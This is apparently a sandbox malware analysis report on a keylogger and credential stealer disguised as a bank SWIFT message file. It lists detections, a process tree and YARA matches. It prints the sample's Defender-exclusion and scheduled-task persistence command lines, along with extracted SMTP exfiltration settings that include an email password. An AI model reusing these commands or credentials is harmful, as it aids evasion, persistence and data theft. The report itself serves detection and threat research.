Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Messaji.png.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Messaji.png.exe
Analysis ID:	1631329
MD5:	7d84e8d750f3e9d07a0e0817ad8e6ceb
SHA1:	89ac3d01ce0cacccac522e4d7d62af77a4fdfce2
SHA256:	59ca67046d065f0fd86ed3ccc7b41aa3168e5557523644fcba23d1ac65ce69d8
Tags:	exeuser-TeamDreier
Infos:

Detection

MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat_Bankasi_Swift_Messaji.png.exe (PID: 2344 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe" MD5: 7D84E8D750F3E9D07A0E0817AD8E6CEB)

powershell.exe (PID: 2200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2924 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Ziraat_Bankasi_Swift_Messaji.png.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe" MD5: 7D84E8D750F3E9D07A0E0817AD8E6CEB)

Native_New-Nova.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)

Native_snake01.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)

BZTCUCKTKd.exe (PID: 7576 cmdline: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe MD5: 7D84E8D750F3E9D07A0E0817AD8E6CEB)

schtasks.exe (PID: 7704 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BZTCUCKTKd.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe" MD5: 7D84E8D750F3E9D07A0E0817AD8E6CEB)

Native_New-Nova.exe (PID: 7800 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)

Native_snake01.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\Native_snake01.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f59e:$a1: get_encryptedPassword 0x5f572:$a2: get_encryptedUsername 0x5f636:$a3: get_timePasswordChanged 0x5f54e:$a4: get_passwordField 0x5f5b4:$a5: set_encryptedPassword 0x5f381:$a7: get_logins 0x5e90b:$a8: GetOutlookPasswords 0x5de34:$a9: StartKeylogger 0x5c796:$a10: KeyLoggerEventArgs 0x5c765:$a11: KeyLoggerEventArgsEventHandler 0x5f455:$a13: _encryptedPassword
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f59e:$a1: get_encryptedPassword 0x5f572:$a2: get_encryptedUsername 0x5f636:$a3: get_timePasswordChanged 0x5f54e:$a4: get_passwordField 0x5f5b4:$a5: set_encryptedPassword 0x5f381:$a7: get_logins 0x5e90b:$a8: GetOutlookPasswords 0x5de34:$a9: StartKeylogger 0x5c796:$a10: KeyLoggerEventArgs 0x5c765:$a11: KeyLoggerEventArgsEventHandler 0x5f455:$a13: _encryptedPassword
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x232d0:$a1: get_encryptedPassword 0x4cfe8:$a1: get_encryptedPassword 0x232a4:$a2: get_encryptedUsername 0x4cfbc:$a2: get_encryptedUsername 0x23368:$a3: get_timePasswordChanged 0x4d080:$a3: get_timePasswordChanged 0x23280:$a4: get_passwordField 0x4cf98:$a4: get_passwordField 0x232e6:$a5: set_encryptedPassword 0x4cffe:$a5: set_encryptedPassword 0x230b3:$a7: get_logins 0x4cdcb:$a7: get_logins 0x2263d:$a8: GetOutlookPasswords 0x4c355:$a8: GetOutlookPasswords 0x21b66:$a9: StartKeylogger 0x4b87e:$a9: StartKeylogger 0x204c8:$a10: KeyLoggerEventArgs 0x4a1e0:$a10: KeyLoggerEventArgs 0x20497:$a11: KeyLoggerEventArgsEventHandler 0x4a1af:$a11: KeyLoggerEventArgsEventHandler 0x23187:$a13: _encryptedPassword
00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76bb4:$a1: get_encryptedPassword 0x76b88:$a2: get_encryptedUsername 0x76c4c:$a3: get_timePasswordChanged 0x76b64:$a4: get_passwordField 0x76bca:$a5: set_encryptedPassword 0x76997:$a7: get_logins 0x721fe:$a10: KeyLoggerEventArgs 0x721cd:$a11: KeyLoggerEventArgsEventHandler 0x76a6b:$a13: _encryptedPassword
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36106:$a1: get_encryptedPassword 0x360da:$a2: get_encryptedUsername 0x3619e:$a3: get_timePasswordChanged 0x360b6:$a4: get_passwordField 0x3611c:$a5: set_encryptedPassword 0x35ee9:$a7: get_logins 0x31750:$a10: KeyLoggerEventArgs 0x3171f:$a11: KeyLoggerEventArgsEventHandler 0x35fbd:$a13: _encryptedPassword
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1e0c0:$a1: get_encryptedPassword 0x1e094:$a2: get_encryptedUsername 0x1e158:$a3: get_timePasswordChanged 0x1e070:$a4: get_passwordField 0x1e0d6:$a5: set_encryptedPassword 0x1dea3:$a7: get_logins 0x1d42d:$a8: GetOutlookPasswords 0x1c956:$a9: StartKeylogger 0x1b2b8:$a10: KeyLoggerEventArgs 0x1b287:$a11: KeyLoggerEventArgsEventHandler 0x1df77:$a13: _encryptedPassword
0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x358e6:$a1: get_encryptedPassword 0x358ba:$a2: get_encryptedUsername 0x3597e:$a3: get_timePasswordChanged 0x35896:$a4: get_passwordField 0x358fc:$a5: set_encryptedPassword 0x356c9:$a7: get_logins 0x30f30:$a10: KeyLoggerEventArgs 0x30eff:$a11: KeyLoggerEventArgsEventHandler 0x3579d:$a13: _encryptedPassword
00000009.00000002.2956686994.0000000002761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
